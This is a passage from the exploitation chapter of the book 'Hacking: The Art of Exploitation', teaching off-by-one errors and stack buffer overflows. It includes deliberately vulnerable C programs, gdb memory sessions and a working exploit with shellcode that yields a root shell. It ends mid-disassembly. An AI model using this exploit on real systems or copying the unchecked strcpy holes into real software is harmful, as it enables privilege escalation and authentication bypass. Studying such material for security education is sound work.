EXPLOITATION - Hacking: The Art of Exploitation (2008)

Hacking: The Art of Exploitation (2008)

Chapter 0x300. EXPLOITATION

Program exploitation is a staple of hacking. As demonstrated in the previous chapter, a program is made up of a complex set of rules following a certain execution flow that ultimately tells the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Since a program can really only do what it's designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places.

A program can only do what it's programmed to do, to the letter of the law. Unfortunately, what's written doesn't always coincide with what the programmer intended the program to do. This principle can be explained with a joke:

A man is walking through the woods, and he finds a magic lamp on the ground. Instinctively, he picks the lamp up, rubs the side of it with his sleeve, and out pops a genie. The genie thanks the man for freeing him, and offers to grant him three wishes. The man is ecstatic and knows exactly what he wants.

"First," says the man, "I want a billion dollars."

The genie snaps his fingers and a briefcase full of money materializes out of thin air.

The man is wide eyed in amazement and continues, "Next, I want a Ferrari."

The genie snaps his fingers and a Ferrari appears from a puff of smoke.

The man continues, "Finally, I want to be irresistible to women."

The genie snaps his fingers and the man turns into a box of chocolates.

Just as the man's final wish was granted based on what he said, rather than what he was thinking, a program will follow its instructions exactly, and the results aren't always what the programmer intended. Sometimes the repercussions can be catastrophic.

Programmers are human, and sometimes what they write isn't exactly what they mean. For example, one common programming error is called an off-by-one error. As the name implies, it's an error where the programmer has miscounted by one. This happens more often than you might think, and it is best illustrated with a question: If you're building a 100-foot fence, with fence posts spaced 10 feet apart, how many fence posts do you need? The obvious answer is 10 fence posts, but this is incorrect, since you actually need 11. This type of off-by-one error is commonly called a fencepost error, and it occurs when a programmer mistakenly counts items instead of spaces between items, or vice versa. Another example is when a programmer is trying to select a range of numbers or items for processing, such as items N through M. If N = 5 and M = 17, how many items are there to process? The obvious answer is M - N, or 17 - 5 = 12 items. But this is incorrect, since there are actually M - N + 1 items, for a total of 13 items. This may seem counterintuitive at first glance, because it is, and that's exactly why these errors happen.

Often, fencepost errors go unnoticed because programs aren't tested for every single possibility, and the effects of a fencepost error don't generally occur during normal program execution. However, when the program is fed the input that makes the effects of the error manifest, the consequences of the error can have an avalanche effect on the rest of the program logic. When properly exploited, an off-by-one error can cause a seemingly secure program to become a security vulnerability.

One classic example of this is OpenSSH, which is meant to be a secure terminal communication program suite, designed to replace insecure and unencrypted services such as telnet, rsh, and rcp. However, there was an off-by-one error in the channel-allocation code that was heavily exploited. Specifically, the code included an if statement that read:

if (id <: 0 || id > channels_alloc) {

It should have been

if (id < 0 || id >= channels_alloc) {

In plain English, the code reads If the ID is less than 0 or the ID is greater than the channels allocated, do the following stuff, when it should have been If the ID is less than 0 or the ID is greater than or equal to the channels allocated, do the following stuff.

This simple off-by-one error allowed further exploitation of the program, so that a normal user authenticating and logging in could gain full administrative rights to the system. This type of functionality certainly wasn't what the programmers had intended for a secure program like OpenSSH, but a computer can only do what it's told.

Another situation that seems to breed exploitable programmer errors is when a program is quickly modified to expand its functionality. While this increase in functionality makes the program more marketable and increases its value, it also increases the program's complexity, which increases the chances of an oversight. Microsoft's IIS webserver program is designed to serve static and interactive web content to users. In order to accomplish this, the program must allow users to read, write, and execute programs and files within certain directories; however, this functionality must be limited to those particular directories. Without this limitation, users would have full control of the system, which is obviously undesirable from a security perspective. To prevent this situation, the program has path-checking code designed to prevent users from using the backslash character to traverse backward through the directory tree and enter other directories.

With the addition of support for the Unicode character set, though, the complexity of the program continued to increase. Unicode is a double-byte character set designed to provide characters for every language, including Chinese and Arabic. By using two bytes for each character instead of just one, Unicode allows for tens of thousands of possible characters, as opposed to the few hundred allowed by single-byte characters. This additional complexity means that there are now multiple representations of the backslash character. For example, %5c in Unicode translates to the backslash character, but this translation was done after the path-checking code had run. So by using %5c instead of \, it was indeed possible to traverse directories, allowing the aforementioned security dangers. Both the Sadmind worm and the CodeRed worm used this type of Unicode conversion oversight to deface web pages.

A related example of this letter-of-the-law principle used outside the realm of computer programming is the LaMacchia Loophole. Just like the rules of a computer program, the US legal system sometimes has rules that don't say exactly what their creators intended, and like a computer program exploit, these legal loopholes can be used to sidestep the intent of the law. Near the end of 1993, a 21-year-old computer hacker and student at MIT named David LaMacchia set up a bulletin board system called Cynosure for the purposes of software piracy. Those who had software to give would upload it, and those who wanted software would download it. The service was only online for about six weeks, but it generated heavy network traffic worldwide, which eventually attracted the attention of university and federal authorities. Software companies claimed that they lost one million dollars as a result of Cynosure, and a federal grand jury charged LaMacchia with one count of conspiring with unknown persons to violate the wire fraud statue. However, the charge was dismissed because what LaMacchia was alleged to have done wasn't criminal conduct under the Copyright Act, since the infringement was not for the purpose of commercial advantage or private financial gain. Apparently, the lawmakers had never anticipated that someone might engage in these types of activities with a motive other than personal financial gain. (Congress closed this loophole in 1997 with the No Electronic Theft Act.) Even though this example doesn't involve the exploiting of a computer program, the judges and courts can be thought of as computers executing the program of the legal system as it was written. The abstract concepts of hacking transcend computing and can be applied to many other aspects of life that involve complex systems.

Generalized Exploit Techniques

Off-by-one errors and improper Unicode expansion are all mistakes that can be hard to see at the time but are glaringly obvious to any programmer in hindsight. However, there are some common mistakes that can be exploited in ways that aren't so obvious. The impact of these mistakes on security isn't always apparent, and these security problems are found in code everywhere. Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and they can be used in a variety of situations.

Most program exploits have to do with memory corruption. These include common exploit techniques like buffer overflows as well as less-common methods like format string exploits. With these techniques, the ultimate goal is to take control of the target program's execution flow by tricking it into running a piece of malicious code that has been smuggled into memory. This type of process hijacking is known as execution of arbitrary code, since the hacker can cause a program to do pretty much anything he or she wants it to. Like the LaMacchia Loophole, these types of vulnerabilities exist because there are specific unexpected cases that the program can't handle. Under normal conditions, these unexpected cases cause the program to crash— metaphorically driving the execution flow off a cliff. But if the environment is carefully controlled, the execution flow can be controlled—preventing the crash and reprogramming the process.

Buffer Overflows

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example.

Buffer Overflows

overflow_example.c

#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[]) {

int value = 5;

char buffer_one[8], buffer_two[8];

strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */

strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */

printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1]));

strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */

printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

By now, you should be able to read the source code above and figure out what the program does. After compilation in the sample output below, we try to copy ten bytes from the first command-line argument into buffer_two, which only has eight bytes allocated for it.

reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example.c

reader@hacking:~/booksrc $ ./overflow_example 1234567890

[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'

[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)

[STRCPY] copying 10 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'

[AFTER] buffer_one is at 0xbffff7f8 and contains '90'

[AFTER] value is at 0xbffff804 and is 5 (0x00000005)

reader@hacking:~/booksrc $

Notice that buffer_one is located directly after buffer_two in memory, so when ten bytes are copied into buffer_two, the last two bytes of 90 overflow into buffer_one and overwrite whatever was there.

A larger buffer will naturally overflow into the other variables, but if a large enough buffer is used, the program will crash and die.

reader@hacking:~/booksrc $ ./overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 29 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'

[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)

Segmentation fault (core dumped)

reader@hacking:~/booksrc $

These types of program crashes are fairly common—think of all of the times a program has crashed or blue-screened on you. The programmer's mistake is one of omission—there should be a length check or restriction on the user-supplied input. These kinds of mistakes are easy to make and can be difficult to spot. In fact, the notesearch.c program on notesearch.c contains a buffer overflow bug. You might not have noticed this until right now, even if you were already familiar with C.

reader@hacking:~/booksrc $ ./notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-------[ end of note data ]-------

Segmentation fault

reader@hacking:~/booksrc $

Program crashes are annoying, but in the hands of a hacker they can become downright dangerous. A knowledgeable hacker can take control of a program as it crashes, with some surprising results. The exploit_notesearch.c code demonstrates the danger.

exploit_notesearch.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

char shellcode[]=

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

unsigned int i, *ptr, ret, offset=270;

char *command, *buffer;

command = (char *) malloc(200);

bzero(command, 200); // Zero out the new memory.

strcpy(command, "./notesearch \'"); // Start command buffer.

buffer = command + strlen(command); // Set buffer at the end.

if(argc > 1) // Set offset.

offset = atoi(argv[1]);

ret = (unsigned int) &i - offset; // Set return address.

for(i=0; i < 160; i+=4) // Fill buffer with return address.

*((unsigned int *)(buffer+i)) = ret;

memset(buffer, 0x90, 60); // Build NOP sled.

memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

strcat(command, "\'");

system(command); // Run exploit.

free(command);

}

This exploit's source code will be explained in depth later, but in general, it's just generating a command string that will execute the notesearch program with a command-line argument between single quotes. It uses string functions to do this: strlen() to get the current length of the string (to position the buffer pointer) and strcat() to concatenate the closing single quote to the end. Finally, the system function is used to execute the command string. The buffer that is generated between the single quotes is the real meat of the exploit. The rest is just a delivery method for this poison pill of data. Watch what a controlled crash can do.

reader@hacking:~/booksrc $ gcc exploit_notesearch.c

reader@hacking:~/booksrc $ ./a.out

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

sh-3.2#

The exploit is able to use the overflow to serve up a root shell—providing full control over the computer. This is an example of a stack-based buffer overflow exploit.

Stack-Based Buffer Overflow Vulnerabilities

The notesearch exploit works by corrupting memory to control execution flow. The auth_overflow.c program demonstrates this concept.

auth_overflow.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int check_authentication(char *password) {

int auth_flag = 0;

char password_buffer[16];

strcpy(password_buffer, password);

if(strcmp(password_buffer, "brillig") == 0)

auth_flag = 1;

if(strcmp(password_buffer, "outgrabe") == 0)

auth_flag = 1;

return auth_flag;

}

int main(int argc, char *argv[]) {

if(argc < 2) {

printf("Usage: %s <password>\n", argv[0]);

exit(0);

}

if(check_authentication(argv[1])) {

printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

printf(" Access Granted.\n");

printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

} else {

printf("\nAccess Denied.\n");

}

}

This example program accepts a password as its only command-line argument and then calls a check_authentication() function. This function allows two passwords, meant to be representative of multiple authentication methods. If either of these passwords is used, the function returns 1, which grants access. You should be able to figure most of that out just by looking at the source code before compiling it. Use the -g option when you do compile it, though, since we will be debugging this later.

reader@hacking:~/booksrc $ gcc -g -o auth_overflow auth_overflow.c

reader@hacking:~/booksrc $ ./auth_overflow

Usage: ./auth_overflow <password>

reader@hacking:~/booksrc $ ./auth_overflow test

Access Denied.

reader@hacking:~/booksrc $ ./auth_overflow brillig

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

reader@hacking:~/booksrc $ ./auth_overflow outgrabe

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

reader@hacking:~/booksrc $

So far, everything works as the source code says it should. This is to be expected from something as deterministic as a computer program. But an overflow can lead to unexpected and even contradictory behavior, allowing access without a proper password.

reader@hacking:~/booksrc $ ./auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

reader@hacking:~/booksrc $

You may have already figured out what happened, but let's look at this with a debugger to see the specifics of it.

reader@hacking:~/booksrc $ gdb -q ./auth_overflow

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4

5 int check_authentication(char *password) {

6 int auth_flag = 0;

7 char password_buffer[16];

8

9 strcpy(password_buffer, password);

10

(gdb)

11 if(strcmp(password_buffer, "brillig") == 0)

12 auth_flag = 1;

13 if(strcmp(password_buffer, "outgrabe") == 0)

14 auth_flag = 1;

15

16 return auth_flag;

17 }

18

19 int main(int argc, char *argv[]) {

20 if(argc < 2) {

(gdb) break 9

Breakpoint 1 at 0x8048421: file auth_overflow.c, line 9.

(gdb) break 16

Breakpoint 2 at 0x804846f: file auth_overflow.c, line 16.

(gdb)

The GDB debugger is started with the -q option to suppress the welcome banner, and breakpoints are set on lines 9 and 16. When the program is run, execution will pause at these breakpoints and give us a chance to examine memory.

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/reader/booksrc/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at

auth_overflow.c:9

9 strcpy(password_buffer, password);

(gdb) x/s password_buffer

0xbffff7a0: ")????o??????)\205\004\b?o??p???????"

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb) print 0xbffff7bc - 0xbffff7a0

$1 = 28

(gdb) x/16xw password_buffer

0xbffff7a0: 0xb7f9f729 0xb7fd6ff4 0xbffff7d8 0x08048529

0xbffff7b0: 0xb7fd6ff4 0xbffff870 0xbffff7d8 0x00000000

0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb

0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc

(gdb)

The first breakpoint is before the strcpy() happens. By examining the password_buffer pointer, the debugger shows it is filled with random uninitialized data and is located at 0xbffff7a0 in memory. By examining the address of the auth_flag variable, we can see both its location at 0xbffff7bc and its value of 0. The print command can be used to do arithmetic and shows that auth_flag is 28 bytes past the start of password_buffer. This relationship can also be seen in a block of memory starting at password_buffer. The location of auth_flag is shown in bold.

(gdb) continue

Continuing.

Breakpoint 2, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at

auth_overflow.c:16

16 return auth_flag;

(gdb) x/s password_buffer

0xbffff7a0: 'A' <repeats 30 times>

(gdb) x/x &auth_flag

0xbffff7bc: 0x00004141

(gdb) x/16xw password_buffer

0xbffff7a0: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x00004141

0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb

0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc

(gdb) x/4cb &auth_flag

0xbffff7bc: 65 'A' 65 'A' 0 '\0' 0 '\0'

(gdb) x/dw &auth_flag

0xbffff7bc: 16705

(gdb)

Continuing to the next breakpoint found after the strcpy(), these memory locations are examined again. The password_buffer overflowed into the auth_flag, changing its first two bytes to 0x41. The value of 0x00004141might look backward again, but remember that x86 has little-endian architecture, so it's supposed to look that way. If you examine each of these four bytes individually, you can see how the memory is actually laid out. Ultimately, the program will treat this value as an integer, with a value of 16705.

(gdb) continue

Continuing.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Program exited with code 034.

(gdb)

After the overflow, the check_authentication() function will return 16705 instead of 0. Since the if statement considers any nonzero value to be authenticated, the program's execution flow is controlled into the authenticated section. In this example, the auth_flag variable is the execution control point, since overwriting this value is the source of the control.

But this is a very contrived example that depends on memory layout of the variables. In auth_overflow2.c, the variables are declared in reverse order. (Changes to auth_overflow.c are shown in bold.)

auth_overflow2.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int check_authentication(char *password) {

char password_buffer[16];

int auth_flag = 0;

strcpy(password_buffer, password);

if(strcmp(password_buffer, "brillig") == 0)

auth_flag = 1;

if(strcmp(password_buffer, "outgrabe") == 0)

auth_flag = 1;

return auth_flag;

}

int main(int argc, char *argv[]) {

if(argc < 2) {

printf("Usage: %s <password>\n", argv[0]);

exit(0);

}

if(check_authentication(argv[1])) {

printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

printf(" Access Granted.\n");

printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

} else {

printf("\nAccess Denied.\n");

}

}

This simple change puts the auth_flag variable before the password_buffer in memory. This eliminates the use of the return_value variable as an execution control point, since it can no longer be corrupted by an overflow.

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4

5 int check_authentication(char *password) {

6 char password_buffer[16];

7 int auth_flag = 0;

8

9 strcpy(password_buffer, password);

10

(gdb)

11 if(strcmp(password_buffer, "brillig") == 0)

12 auth_flag = 1;

13 if(strcmp(password_buffer, "outgrabe") == 0)

14 auth_flag = 1;

15

16 return auth_flag;

17 }

18

19 int main(int argc, char *argv[]) {

20 if(argc < 2) {

(gdb) break 9

Breakpoint 1 at 0x8048421: file auth_overflow2.c, line 9.

(gdb) break 16

Breakpoint 2 at 0x804846f: file auth_overflow2.c, line 16.

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at

auth_overflow2.c:9

9 strcpy(password_buffer, password);

(gdb) x/s password_buffer

0xbffff7c0: "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\

bH???????\002"

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb) x/16xw &auth_flag

0xbffff7bc: 0x00000000 0xb7fd6ff4 0xbffff880 0xbffff7e8

0xbffff7cc: 0xb7fd6ff4 0xb7ff47b0 0x08048510 0xbffff7e8

0xbffff7dc: 0x080484bb 0xbffff9b7 0x08048510 0xbffff848

0xbffff7ec: 0xb7eafebc 0x00000002 0xbffff874 0xbffff880

(gdb)

Similar breakpoints are set, and an examination of memory shows that auth_flag (shown in bold above and below) is located before password_buffer in memory. This means auth_flag can never be overwritten by an overflow in password_buffer.

(gdb) cont

Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)

at auth_overflow2.c:16

16 return auth_flag;

(gdb) x/s password_buffer

0xbffff7c0: 'A' <repeats 30 times>

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb) x/16xw &auth_flag

0xbffff7bc: 0x00000000 0x41414141 0x41414141 0x41414141

0xbffff7cc: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff7dc: 0x08004141 0xbffff9b7 0x08048510 0xbffff848

0xbffff7ec: 0xb7eafebc 0x00000002 0xbffff874 0xbffff880

(gdb)

As expected, the overflow cannot disturb the auth_flag variable, since it's located before the buffer. But another execution control point does exist, even though you can't see it in the C code. It's conveniently located after all the stack variables, so it can easily be overwritten. This memory is integral to the operation of all programs, so it exists in all programs, and when it's overwritten, it usually results in a program crash.

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x08004141 in ?? ()

(gdb)

Recall from the previous chapter that the stack is one of five memory segments used by programs. The stack is a FILO data structure used to maintain execution flow and context for local variables during function calls. When a function is called, a structure called a stack frame is pushed onto the stack, and the EIP register jumps to the first instruction of the function. Each stack frame contains the local variables for that function and a return address so EIP can be restored. When the function is done, the stack frame is popped off the stack and the return address is used to restore EIP. All of this is built in to the architecture and is usually handled by the compiler, not the programmer.

When the check_authentication() function is called, a new stack frame is pushed onto the stack above main()'s stack frame. In this frame are the local variables, a return address, and the function's arguments.

We can see all these elements in the debugger.

Figure 0x300-1.

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4

5 int check_authentication(char *password) {

6 char password_buffer[16];

7 int auth_flag = 0;

8

9 strcpy(password_buffer, password);

10

(gdb)

11 if(strcmp(password_buffer, "brillig") == 0)

12 auth_flag = 1;

13 if(strcmp(password_buffer, "outgrabe") == 0)

14 auth_flag = 1;

15

16 return auth_flag;

17 }

18

19 int main(int argc, char *argv[]) {

20 if(argc < 2) {

(gdb)

21 printf("Usage: %s <password>\n", argv[0]);

22 exit(0);

23 }

24 if(check_authentication(argv[1])) {

25 printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

26 printf(" Access Granted.\n");

27 printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

28 } else {

29 printf("\nAccess Denied.\n");

30 }

(gdb) break 24

Breakpoint 1 at 0x80484ab: file auth_overflow2.c, line 24.

(gdb) break 9

Breakpoint 2 at 0x8048421: file auth_overflow2.c, line 9.

(gdb) break 16

Breakpoint 3 at 0x804846f: file auth_overflow2.c, line 16.

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2.c:24

24 if(check_authentication(argv[1])) {

(gdb) i r esp

esp 0xbffff7e0 0xbffff7e0

(gdb) x/32xw $esp

0xbffff7e0: 0xb8000ce0 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

0xbffff820: 0x40f5f7f0 0x48e0fe81 0x00000000 0x00000000

0xbffff830: 0x00000000 0xb7ff9300 0xb7eafded 0xb8000ff4

0xbffff840: 0x00000002 0x08048350 0x00000000 0x08048371

0xbffff850: 0x08048474 0x00000002 0xbffff874 0x08048510

(gdb)

The first breakpoint is right before the call to check_authentication()in main(). At this point, the stack pointer register (ESP) is 0xbffff7e0, and the top of the stack is shown. This is all part of main()'s stack frame. Continuing to the next breakpoint inside check_authentication(), the output below shows ESP is smaller as it moves up the list of memory to make room for check_authentication()'s stack frame (shown in bold), which is now on the stack. After finding the addresses of the auth_flag variable () and the variable password_buffer (), their locations can be seen within the stack frame.

(gdb) c

Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at

auth_overflow2.c:9

9 strcpy(password_buffer, password);

(gdb) i r esp

esp 0xbffff7a0 0xbffff7a0

(gdb) x/32xw $esp

0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4

0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) p 0xbffff7e0 - 0xbffff7a0

$1 = 64

(gdb) x/s password_buffer

0xbffff7c0: "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\

bH???????\002"

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb)

Continuing to the second breakpoint in check_authentication(), a stack frame (shown in bold) is pushed onto the stack when the function is called. Since the stack grows upward toward lower memory addresses, the stack pointer is now 64 bytes less at 0xbffff7a0. The size and structure of a stack frame can vary greatly, depending on the function and certain compiler optimizations. For example, the first 24 bytes of this stack frame are just padding put there by the compiler. The local stack variables, auth_flag and password_buffer, are shown at their respective memory locations in the stack frame. The auth_flag is shown at 0xbffff7bc, and the 16 bytes of the password buffer are shown at 0xbffff7c0.

The stack frame contains more than just the local variables and padding. Elements of the check_authentication() stack frame are shown below.

First, the memory saved for the local variables is shown in italic. This starts at the auth_flag variable at 0xbffff7bc and continues through the end of the 16-byte password_buffer variable. The next few values on the stack are just padding the compiler threw in, plus something called the saved frame pointer. If the program is compiled with the flag -fomit-frame-pointer for optimization, the frame pointer won't be used in the stack frame. At the value 0x080484bb is the return address of the stack frame, and at the address 0xbffffe9b7 is a pointer to a string containing 30 As. This must be the argument to the check_authentication() function.

(gdb) x/32xw $esp

0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4

0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) x/32xb 0xbffff9b7

0xbffff9b7: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff9bf: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff9c7: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff9cf: 0x41 0x41 0x41 0x41 0x41 0x41 0x00 0x53

(gdb) x/s 0xbffff9b7

0xbffff9b7: 'A' <repeats 30 times>

(gdb)

The return address in a stack frame can be located by understanding how the stack frame is created. This process begins in the main() function, even before the function call.

(gdb) disass main

Dump of assembler code for function main:

0x08048474 <main+0>: push ebp

0x08048475 <main+1>: mov ebp,esp

0x08048477 <main+3>: sub esp,0x8

0x0804847a <main+6>: and esp,0xfffffff0

0x0804847d <main+9>: mov eax,0x0

0x08048482 <main+14>: sub esp,eax

0x08048484 <main+16>: cmp DWORD PTR [ebp+8],0x1

0x08048488 <main+20>: jg 0x80484ab <main+55>

0x0804848a <main+22>: mov eax,DWORD PTR [ebp+12]

0x0804848d <main+25>: mov eax,DWORD PTR [eax]

0x0804848f <main+27>: mov DWORD PTR [esp+4],eax

0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5

0x0804849a <main+38>: call 0x804831c <printf@plt>

0x0804849f <main+43>: mov DWORD PTR [esp],0x0

0x080484a6 <main+50>: call 0x804833c <exit@plt>

0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]

0x080484ae <main+58>: add eax,0x4

0x080484b1 <main+61>: mov eax,DWORD PTR [eax]

0x080484b3 <main+63>: mov DWORD PTR [esp],eax

0x080484b6 <main+66>: call 0x8048414 <check_authentication>

0x080484bb <main+71>: test eax,eax

0x080484bd <main+73>: je 0x80484e5 <main+113>

0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb

0x080484c6 <main+82>: call 0x804831c <printf@plt>

0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619

0x080484d2 <main+94>: call 0x804831c <printf@plt>

0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630

0x080484de <main+106>: call 0x804831c <printf@plt>

0x080484e3 <main+111>: jmp 0x80484f1 <main+125>

